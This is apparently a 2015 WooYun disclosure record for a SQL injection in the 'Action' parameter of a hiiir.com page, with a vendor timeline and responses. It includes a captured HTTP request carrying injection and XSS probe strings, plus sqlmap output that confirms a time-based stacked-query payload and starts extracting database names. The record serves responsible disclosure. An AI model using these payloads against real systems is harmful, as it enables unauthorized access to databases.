乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-26: 细节已通知厂商并且等待厂商处理中 2015-10-26: 厂商已经确认,细节仅向厂商公开 2015-11-05: 细节向核心白帽子及相关领域专家公开 2015-11-15: 细节向普通白帽子公开 2015-11-23: 厂商已经修复漏洞并主动公开,细节向公众公开
2
POST數據包:
GET /Message/getpagemessage?Action=-1&ClosePage=&Controller=User&_=1445655600743 HTTP/1.1X-Forwarded-For: 8.8.8.8'X-Requested-With: XMLHttpRequestReferer: http://buzz.hiiir.com:80/Cookie: PHPSESSID=8knlf54qjp4n8voppsoambted4; _Timer=2; __atuvc=1%7C42; __atuvs=562af43046ed06bb000; __utmt=1; __utma=112679063.678026744.1445655602.1445655602.1445655602.1; __utmb=112679063.1.10.1445655602; __utmc=112679063; __utmz=112679063.1445655602.1.1.utmcsr=acunetix-referrer.com|utmccn=(referral)|utmcmd=referral|utmcct=/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss")Host: buzz.hiiir.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*
GET parameter 'Action' is vulnerable. Do you want to keep testing the others (if any)? [y/N] nsqlmap identified the following injection point(s) with a total of 62 HTTP(s) requests:---Parameter: Action (GET) Type: stacked queries Title: MySQL > 5.0.11 stacked queries (SELECT - comment) Payload: Action=-1');(SELECT * FROM (SELECT(SLEEP(5)))IWDZ)#&ClosePage=&Controller=User&_=1445655600743---[11:25:32] [INFO] the back-end DBMS is MySQLweb application technology: PHP 5.2.10back-end DBMS: MySQL 5.0.11[11:25:32] [INFO] fetching database names[11:25:32] [INFO] fetching number of databases[11:25:32] [INFO] retrieved:[11:25:32] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errorsdo you want sqlmap to try to optimize value(s) for DBMS delay responses (option'--time-sec')? [Y/n] y[11:26:25] [INFO] adjusting time delay to 4 seconds due to good response times[11:26:33] [ERROR] invalid character detected. retrying..[11:26:33] [WARNING] increasing time delay to 5 seconds[11:27:09] [ERROR] invalid character detected. retrying..[11:27:09] [WARNING] increasing time delay to 6 seconds8[11:27:47] [INFO] retrieved: informatio
危害等级:高
漏洞Rank:15
确认时间:2015-10-26 18:16
此網站屬於公司早期服務,後續已經沒有再持續維護,但是我們仍然感謝您的回報,我們會儘快處理
2015-11-23:部分服務為公司早期服務且未來將暫停維運,目前已完成下線作業,再次感謝漏洞回報,以後將會持續加強內部管理流程